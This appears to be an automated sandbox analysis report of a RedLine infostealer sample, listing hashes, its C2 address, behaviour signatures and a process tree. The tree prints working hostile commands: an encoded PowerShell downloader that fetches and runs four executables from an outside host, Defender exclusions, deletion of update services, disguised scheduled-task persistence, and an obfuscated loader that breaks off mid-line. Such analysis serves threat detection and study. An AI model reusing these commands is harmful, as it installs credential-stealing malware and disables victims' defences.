Overview

overview

10

Static

static

1

aa95d6c08a...82.exe

windows7-x64

7

aa95d6c08a...82.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    151s
  • max time network
    130s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    05/02/2023, 06:45

Sharing

Copy URL Twitter E-mail
Report Analysis Logs

General

  • Target

    aa95d6c08ae9201828da23593e42df4a2e39ce82.exe

  • Size

    626KB

  • MD5

    47b01695ff80b03ae518b333163da42c

  • SHA1

    aa95d6c08ae9201828da23593e42df4a2e39ce82

  • SHA256

    474301aa2294450d6e60ae07824076744bccc4b2603a03cee01de3b4dbada38e

  • SHA512

    886a285e76a7d41e14bb1cfef3a464dc47e4b665bfd6905f26961253fd5f4eee0a6fed01afd464d603c8d17f6d09edc475e2fdd4da79178c6be0f54dc5bad466

  • SSDEEP

    6144:fMEN1L7wFSXZX4KipZx7fuwkBzvGwxAOo8jRfAAfc:f9N1LkFSJX45p3Uhq8jRAAE

Score
10/10
redline1evasioninfostealerspyware

Malware Config

Extracted

Family

redline

Botnet

1

C2

107.182.129.73:21733

Attributes
  • auth_value

    3a5bb0917495b4312d052a0b8977d2bb

Signatures

  • Modifies security service 2 TTPs 5 IoCs
    evasion
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

    infostealerredline
  • RedLine payload 1 IoCs
  • Suspicious use of NtCreateProcessExOtherParentProcess 2 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 7 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Stops running service(s) 3 TTPs
    evasion
  • Executes dropped EXE 5 IoCs
  • Uses the VBS compiler for execution 1 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Drops file in System32 directory 18 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Program Files directory 1 IoCs
  • Launches sc.exe 5 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Program crash 5 IoCs
  • Checks processor information in registry 2 TTPs 9 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Enumerates system info in registry 2 TTPs 6 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\lsass.exe
    C:\Windows\system32\lsass.exe
    1⤵
    • Drops file in System32 directory
    PID:664
  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:604
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:332
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{b27cdd25-09ca-47d4-9a4f-14937d71a37c}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:876
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
        1⤵
          PID:948
        • C:\Windows\System32\svchost.exe
          C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
          1⤵
            PID:680
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
            1⤵
              PID:508
            • C:\Windows\system32\svchost.exe
              C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
              1⤵
              • Drops file in System32 directory
              • Modifies data under HKEY_USERS
              PID:4364
            • C:\Windows\system32\svchost.exe
              C:\Windows\system32\svchost.exe -k LocalService -s W32Time
              1⤵
                PID:3728
              • C:\Windows\system32\SppExtComObj.exe
                C:\Windows\system32\SppExtComObj.exe -Embedding
                1⤵
                  PID:2260
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                  1⤵
                    PID:4528
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                    1⤵
                      PID:5008
                    • C:\Windows\System32\svchost.exe
                      C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                      1⤵
                        PID:4452
                      • C:\Windows\System32\svchost.exe
                        C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                        1⤵
                          PID:4000
                        • C:\Windows\System32\svchost.exe
                          C:\Windows\System32\svchost.exe -k netsvcs -p
                          1⤵
                            PID:532
                          • C:\Windows\System32\RuntimeBroker.exe
                            C:\Windows\System32\RuntimeBroker.exe -Embedding
                            1⤵
                              PID:4700
                            • C:\Users\Admin\AppData\Local\Temp\aa95d6c08ae9201828da23593e42df4a2e39ce82.exe
                              "C:\Users\Admin\AppData\Local\Temp\aa95d6c08ae9201828da23593e42df4a2e39ce82.exe"
                              1⤵
                              • Suspicious use of SetThreadContext
                              • Suspicious use of WriteProcessMemory
                              PID:880
                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
                                2⤵
                                • Suspicious use of WriteProcessMemory
                                PID:808
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AYwBjACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAeAB5AHEAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAdQB0AGMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAYgBlAGsAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBjAG8AbgBuAGUAYwB0ADIAbQBlAC4AaABvAHAAdABvAC4AbwByAGcALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBuAGUAdwAyAC4AZQB4AGUAJwAsACAAPAAjAGwAbQBxACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAcgBoAHMAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAdAB2AGQAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbgBlAHcAMgAuAGUAeABlACcAKQApADwAIwBiAGMAagAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AYwBvAG4AbgBlAGMAdAAyAG0AZQAuAGgAbwBwAHQAbwAuAG8AcgBnAC8AdwBvAHcALwAxAC8AMgAvADMALwA0AC8ANQAvADYALwA3AC8AQwA0AEwAbwBhAGQAZQByAC4AZQB4AGUAJwAsACAAPAAjAHMAbQBpACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAeAB5AGYAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAdABqAHoAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAQwA0AEwAbwBhAGQAZQByAC4AZQB4AGUAJwApACkAPAAjAHIAegB1ACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBjAG8AbgBuAGUAYwB0ADIAbQBlAC4AaABvAHAAdABvAC4AbwByAGcALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBTAG0AYQByAHQARABlAGYAUgB1AG4ALgBlAHgAZQAnACwAIAA8ACMAdAB1AGwAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBjAGwAbgAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwB0AGQAawAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBTAG0AYQByAHQARABlAGYAUgB1AG4ALgBlAHgAZQAnACkAKQA8ACMAcAB4AHgAIwA+ADsAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBoAG8AcAB0AG8ALgBvAHIAZwAvAHcAbwB3AC8AMQAvADIALwAzAC8ANAAvADUALwA2AC8ANwAvAFMAeQBzAEEAcABwAC4AZQB4AGUAJwAsACAAPAAjAGQAawBjACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAcQBkAGQAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAdwB5AHoAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAUwB5AHMAQQBwAHAALgBlAHgAZQAnACkAKQA8ACMAZgBmAHgAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAYwBuAHEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHkAdwBwACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAG4AZQB3ADIALgBlAHgAZQAnACkAPAAjAHcAaABrACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHkAagB0ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBhAHgAagAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBDADQATABvAGEAZABlAHIALgBlAHgAZQAnACkAPAAjAHIAawBrACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAGEAdQB6ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBnAHUAaQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBTAG0AYQByAHQARABlAGYAUgB1AG4ALgBlAHgAZQAnACkAPAAjAG0AegBrACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAGEAegB0ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwB3AHUAbAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBTAHkAcwBBAHAAcAAuAGUAeABlACcAKQA8ACMAcwBhAGcAIwA+AA=="
                                  3⤵
                                  • Blocklisted process makes network request
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  • Suspicious use of WriteProcessMemory
                                  PID:1412
                                  • C:\Users\Admin\AppData\Local\Temp\new2.exe
                                    "C:\Users\Admin\AppData\Local\Temp\new2.exe"
                                    4⤵
                                    • Executes dropped EXE
                                    • Suspicious use of SetThreadContext
                                    • Suspicious use of WriteProcessMemory
                                    PID:1580
                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
                                      5⤵
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:3880
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -u -p 1580 -s 264
                                      5⤵
                                      • Program crash
                                      PID:1468
                                  • C:\Users\Admin\AppData\Local\Temp\C4Loader.exe
                                    "C:\Users\Admin\AppData\Local\Temp\C4Loader.exe"
                                    4⤵
                                    • Executes dropped EXE
                                    PID:2168
                                  • C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe
                                    "C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe"
                                    4⤵
                                    • Suspicious use of NtCreateUserProcessOtherParentProcess
                                    • Drops file in Drivers directory
                                    • Executes dropped EXE
                                    • Suspicious use of SetThreadContext
                                    • Drops file in Program Files directory
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of WriteProcessMemory
                                    PID:1888
                                  • C:\Users\Admin\AppData\Local\Temp\SysApp.exe
                                    "C:\Users\Admin\AppData\Local\Temp\SysApp.exe"
                                    4⤵
                                    • Executes dropped EXE
                                    • Suspicious behavior: EnumeratesProcesses
                                    PID:4720
                                    • C:\Windows\SysWOW64\schtasks.exe
                                      /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe"
                                      5⤵
                                      • Creates scheduled task(s)
                                      PID:2624
                                      • C:\Windows\System32\Conhost.exe
                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        6⤵
                                          PID:2004
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 880 -s 280
                                  2⤵
                                  • Program crash
                                  PID:4816
                              • C:\Windows\System32\RuntimeBroker.exe
                                C:\Windows\System32\RuntimeBroker.exe -Embedding
                                1⤵
                                  PID:3824
                                • C:\Windows\System32\RuntimeBroker.exe
                                  C:\Windows\System32\RuntimeBroker.exe -Embedding
                                  1⤵
                                    PID:3512
                                  • C:\Windows\system32\DllHost.exe
                                    C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                    1⤵
                                      PID:3456
                                      • C:\Windows\system32\WerFault.exe
                                        C:\Windows\system32\WerFault.exe -u -p 3456 -s 372
                                        2⤵
                                        • Program crash
                                        • Checks processor information in registry
                                        • Enumerates system info in registry
                                        • Suspicious behavior: EnumeratesProcesses
                                        PID:1784
                                    • C:\Windows\system32\DllHost.exe
                                      C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                      1⤵
                                        PID:3308
                                        • C:\Windows\system32\WerFault.exe
                                          C:\Windows\system32\WerFault.exe -u -p 3308 -s 972
                                          2⤵
                                          • Program crash
                                          • Checks processor information in registry
                                          • Enumerates system info in registry
                                          • Suspicious behavior: EnumeratesProcesses
                                          PID:2460
                                      • C:\Windows\system32\svchost.exe
                                        C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                        1⤵
                                          PID:3108
                                        • C:\Windows\Explorer.EXE
                                          C:\Windows\Explorer.EXE
                                          1⤵
                                          • Suspicious behavior: GetForegroundWindowSpam
                                          PID:2228
                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                            2⤵
                                            • Suspicious behavior: EnumeratesProcesses
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:4016
                                          • C:\Windows\System32\cmd.exe
                                            C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                                            2⤵
                                            • Suspicious use of WriteProcessMemory
                                            PID:388
                                            • C:\Windows\System32\sc.exe
                                              sc stop UsoSvc
                                              3⤵
                                              • Launches sc.exe
                                              PID:4284
                                            • C:\Windows\System32\sc.exe
                                              sc stop WaaSMedicSvc
                                              3⤵
                                              • Launches sc.exe
                                              PID:3592
                                            • C:\Windows\System32\sc.exe
                                              sc stop wuauserv
                                              3⤵
                                              • Launches sc.exe
                                              PID:1804
                                            • C:\Windows\System32\sc.exe
                                              sc stop bits
                                              3⤵
                                              • Launches sc.exe
                                              PID:1720
                                            • C:\Windows\System32\sc.exe
                                              sc stop dosvc
                                              3⤵
                                              • Launches sc.exe
                                              PID:3756
                                            • C:\Windows\System32\reg.exe
                                              reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
                                              3⤵
                                                PID:3176
                                              • C:\Windows\System32\reg.exe
                                                reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
                                                3⤵
                                                  PID:2720
                                                • C:\Windows\System32\reg.exe
                                                  reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
                                                  3⤵
                                                  • Modifies security service
                                                  PID:2540
                                                • C:\Windows\System32\reg.exe
                                                  reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
                                                  3⤵
                                                    PID:4464
                                                  • C:\Windows\System32\reg.exe
                                                    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                                                    3⤵
                                                      PID:4876
                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#thpqznhs#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'WindowsDefenderSmartScreenQC' /tr '''C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'WindowsDefenderSmartScreenQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderSmartScreenQC" /t REG_SZ /f /d 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe' }
                                                    2⤵
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:2240
                                                  • C:\Windows\System32\dialer.exe
                                                    C:\Windows\System32\dialer.exe
                                                    2⤵
                                                      PID:3584
                                                  • C:\Windows\system32\svchost.exe
                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                    1⤵
                                                      PID:2792
                                                    • C:\Windows\system32\svchost.exe
                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                      1⤵
                                                        PID:2784
                                                      • C:\Windows\System32\svchost.exe
                                                        C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                        1⤵
                                                          PID:2772
                                                        • C:\Windows\system32\svchost.exe
                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                          1⤵
                                                            PID:2748
                                                          • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                            "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                            1⤵
                                                            • Drops file in System32 directory
                                                            • Modifies data under HKEY_USERS
                                                            PID:2704
                                                          • C:\Windows\system32\svchost.exe
                                                            C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                            1⤵
                                                            • Drops file in System32 directory
                                                            PID:2696
                                                          • C:\Windows\system32\svchost.exe
                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                            1⤵
                                                              PID:2560
                                                            • C:\Windows\system32\svchost.exe
                                                              C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                              1⤵
                                                                PID:2548
                                                              • C:\Windows\system32\taskhostw.exe
                                                                taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                                                                1⤵
                                                                  PID:2476
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                  1⤵
                                                                    PID:2380
                                                                  • C:\Windows\system32\sihost.exe
                                                                    sihost.exe
                                                                    1⤵
                                                                      PID:2372
                                                                    • C:\Windows\System32\svchost.exe
                                                                      C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                                      1⤵
                                                                        PID:2248
                                                                      • C:\Windows\System32\svchost.exe
                                                                        C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                                        1⤵
                                                                          PID:2140
                                                                        • C:\Windows\System32\spoolsv.exe
                                                                          C:\Windows\System32\spoolsv.exe
                                                                          1⤵
                                                                            PID:2068
                                                                          • C:\Windows\System32\svchost.exe
                                                                            C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                                            1⤵
                                                                              PID:2028
                                                                            • C:\Windows\system32\svchost.exe
                                                                              C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                                              1⤵
                                                                                PID:1976
                                                                              • C:\Windows\System32\svchost.exe
                                                                                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                                                1⤵
                                                                                  PID:1932
                                                                                • C:\Windows\system32\svchost.exe
                                                                                  C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                                                                  1⤵
                                                                                    PID:1924
                                                                                  • C:\Windows\System32\svchost.exe
                                                                                    C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                                                                    1⤵
                                                                                      PID:1840
                                                                                    • C:\Windows\System32\svchost.exe
                                                                                      C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                                                      1⤵
                                                                                        PID:1796
                                                                                      • C:\Windows\System32\svchost.exe
                                                                                        C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                                                                        1⤵
                                                                                          PID:1696
                                                                                        • C:\Windows\system32\svchost.exe
                                                                                          C:\Windows\system32\svchost.exe -k LocalService -p -s FontCache
                                                                                          1⤵
                                                                                            PID:1668
                                                                                          • C:\Windows\System32\svchost.exe
                                                                                            C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                                                                            1⤵
                                                                                              PID:1644
                                                                                            • C:\Windows\system32\svchost.exe
                                                                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                                                                              1⤵
                                                                                                PID:1564
                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                                                                                1⤵
                                                                                                  PID:1516
                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                  C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                                                                                                  1⤵
                                                                                                    PID:1372
                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                    C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                                                                                    1⤵
                                                                                                      PID:1364
                                                                                                    • C:\Windows\System32\svchost.exe
                                                                                                      C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                                                                                      1⤵
                                                                                                        PID:1356
                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                                                                                        1⤵
                                                                                                          PID:1340
                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                          C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                                                                                                          1⤵
                                                                                                            PID:1320
                                                                                                          • C:\Windows\System32\svchost.exe
                                                                                                            C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                                                                                                            1⤵
                                                                                                            • Drops file in System32 directory
                                                                                                            PID:1204
                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                                                                                                            1⤵
                                                                                                              PID:1172
                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                                                                                                              1⤵
                                                                                                              • Drops file in System32 directory
                                                                                                              PID:1112
                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:PZcsGHnLCyjR{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$JsIaLpiYGKoKLt,[Parameter(Position=1)][Type]$tCaebCUAXD)$YsromgQNTPv=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+'e'+''+[Char](102)+''+[Char](108)+'ect'+[Char](101)+''+[Char](100)+''+'D'+''+[Char](101)+''+[Char](108)+''+[Char](101)+'gat'+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'nM'+[Char](101)+'m'+[Char](111)+'r'+[Char](121)+'M'+'o'+''+'d'+'u'+'l'+''+[Char](101)+'',$False).DefineType(''+'M'+''+[Char](121)+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+'a'+'t'+[Char](101)+''+'T'+''+'y'+'pe',''+[Char](67)+''+'l'+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](80)+'u'+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+'S'+'e'+''+'a'+''+[Char](108)+''+[Char](101)+''+[Char](100)+''+[Char](44)+'A'+'n'+''+[Char](115)+''+[Char](105)+''+[Char](67)+'l'+[Char](97)+''+'s'+''+[Char](115)+''+','+''+[Char](65)+''+[Char](117)+'t'+[Char](111)+''+[Char](67)+'l'+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$YsromgQNTPv.DefineConstructor(''+[Char](82)+''+[Char](84)+''+[Char](83)+''+[Char](112)+''+[Char](101)+''+[Char](99)+''+'i'+''+[Char](97)+''+'l'+''+[Char](78)+''+[Char](97)+''+[Char](109)+''+'e'+''+[Char](44)+''+'H'+''+'i'+''+[Char](100)+'e'+[Char](66)+'y'+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](80)+''+[Char](117)+'b'+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$JsIaLpiYGKoKLt).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+'t'+'i'+[Char](109)+''+[Char](101)+','+'M'+''+[Char](97)+'na'+'g'+''+'e'+''+'d'+'');$YsromgQNTPv.DefineMethod(''+'I'+''+[Char](110)+''+[Char](118)+''+[Char](111)+''+[Char](107)+''+'e'+'',''+'P'+''+[Char](117)+''+[Char](98)+''+'l'+''+[Char](105)+''+'c'+''+[Char](44)+''+'H'+''+[Char](105)+''+'d'+''+'e'+''+[Char](66)+''+[Char](121)+''+'S'+''+'i'+''+[Char](103)+''+','+''+[Char](78)+'ew'+'S'+''+[Char](108)+''+'o'+''+[Char](116)+''+[Char](44)+''+[Char](86)+'i'+[Char](114)+''+[Char](116)+''+[Char](117)+''+'a'+''+'l'+'',$tCaebCUAXD,$JsIaLpiYGKoKLt).SetImplementationFlags(''+'R'+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+'m'+''+[Char](101)+''+[Char](44)+''+'M'+''+'a'+'n'+[Char](97)+''+[Char](103)+'ed');Write-Output $YsromgQNTPv.CreateType();}$yRdJjHUAjbvWO=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And 